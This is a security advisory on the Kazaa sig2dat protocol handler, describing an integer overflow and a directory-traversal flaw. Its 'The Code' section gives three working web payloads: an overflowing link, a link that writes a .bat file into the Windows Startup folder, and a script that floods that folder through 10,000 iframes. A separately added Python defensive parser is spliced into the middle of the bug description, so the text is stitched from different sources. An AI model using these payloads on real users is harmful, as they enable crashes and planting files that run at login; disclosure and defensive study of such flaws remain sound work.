~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application:  Kazaa
Vendors:      http://www.kazaa.com
Versions:     Kazaa Lite K++ (probably all others too...)
Platforms:    Windows
Bug:          Sig2Dat protocol remote integer overflow and denial of
              service by creating files in arbitrary locations
Exploitation: Remote, with browser
Date:         17 Jan 2005
Author:       Rafel Ivgi, The-Insider
E-Mail:       the_insider@xxxxxxxx
Website:      http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

Kazaa is currently the world's most widely used P2P file sharing
application. Installing Kazaa registers a new URL protocol handler named
"sig2dat". This handler contains an integer overflow vulnerability that
can crash the application and may allow remote code execution. A second
vulnerability in the "File:" parameter allows creating files in arbitrary
locations and causing a denial of service.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

=======
2) Bugs
=======

The sig2dat protocol syntax:

sig2dat://<filename>%7c<file length in bytes><file length in kilobytes>%7c<HASH>%7c

The vulnerable parameter is the file "Length" (in bytes): a numeric value
larger than 999999999 triggers the integer overflow. Successful
exploitation of this vulnerability may allow remote code execution.

There is another vulnerability in the "File:" parameter. It allows
creation of files in arbitrary locations on the same partition as the
shared folder, using the classic directory traversal sequence "../".
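A defensive parser for the sig2dat link format described above, added here as an example and not Kazaa's own code: it decodes the link exactly once, range-checks "Length" before the value could reach any 32-bit arithmetic, and rejects any "File" value that is not a bare filename. The 32-bit bound and the field names File/Length/UUHash (taken from the links on this page) are assumptions about the handler.

```python
import re
import urllib.parse

# Bound for "Length": the 32-bit signed maximum. This is an assumption; the
# advisory only states that values above 999999999 trigger the overflow.
MAX_LENGTH_BYTES = 2**31 - 1


class Sig2datError(ValueError):
    """Raised for any link that would have hit one of the two bugs."""


def parse_sig2dat(url: str) -> dict:
    """Parse a sig2dat:// link into File, Length and UUHash, validating each."""
    if not url.lower().startswith("sig2dat://"):
        raise Sig2datError("not a sig2dat link")
    # Decode exactly once; fields are '|'-delimited (%7C on the wire).
    body = urllib.parse.unquote(url[len("sig2dat://"):])
    fields = {}
    for part in filter(None, body.strip("/").split("|")):
        key, sep, val = part.partition(":")
        if not sep:
            raise Sig2datError(f"malformed field {part!r}")
        fields[key] = val
    missing = {"File", "Length", "UUHash"} - fields.keys()
    if missing:
        raise Sig2datError(f"missing field(s): {sorted(missing)}")

    # Bug 1: Length is "<bytes> Bytes,<kb>KB". Python ints cannot overflow,
    # so this is a range check before the value is handed to 32-bit code.
    m = re.fullmatch(r"(\d+) Bytes,(\d+)KB", fields["Length"])
    if not m:
        raise Sig2datError("malformed Length")
    length = int(m.group(1))
    if length > MAX_LENGTH_BYTES:
        raise Sig2datError(f"Length {length} exceeds 32-bit range")

    # Bug 2: File must be a bare filename. Reject both separator styles, drive
    # letters, '.'/'..', and any '%' a second decode could turn into '/'.
    name = fields["File"]
    if not name or name in (".", "..") or any(c in name for c in "/\\:%"):
        raise Sig2datError(f"File {name!r} is not a plain filename")

    return {"file": name, "length": length,
            "uuhash": fields["UUHash"].lstrip("=")}


def is_safe_link(url: str) -> bool:
    """True if the link parses cleanly under the checks above, else False."""
    try:
        parse_sig2dat(url)
        return True
    except Sig2datError:
        return False
```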
For example:

<A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu/Programs/Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK HERE</A>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

1)

<A HREF="sig2dat://%7CFile:dev-catz5%28.bin%7CLength:999999999999999999999999999%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK HERE</A>

*********************************************************************

2)

<A HREF="sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu/Programs/Startup/cool.bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/">CLICK HERE</A>

*********************************************************************

3)

<script>
var i;
for (i = 1; i < 10000; i++) {
  mylocation = "<iframe src='sig2dat://%7CFile:../../../../../../Docume~1/All Users/Start Menu/Programs/Startup/cool" + i + ".bat%7CLength:373236528%20Bytes,364489KB%7CUUHash:=DEfm3HmvILkNcbY7j5NGa%2BD11CQ=%7C/'></iframe>";
  document.write(mylocation);
}
</script>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Scripts and Codes will make me D.O.S, but they will never HACK me."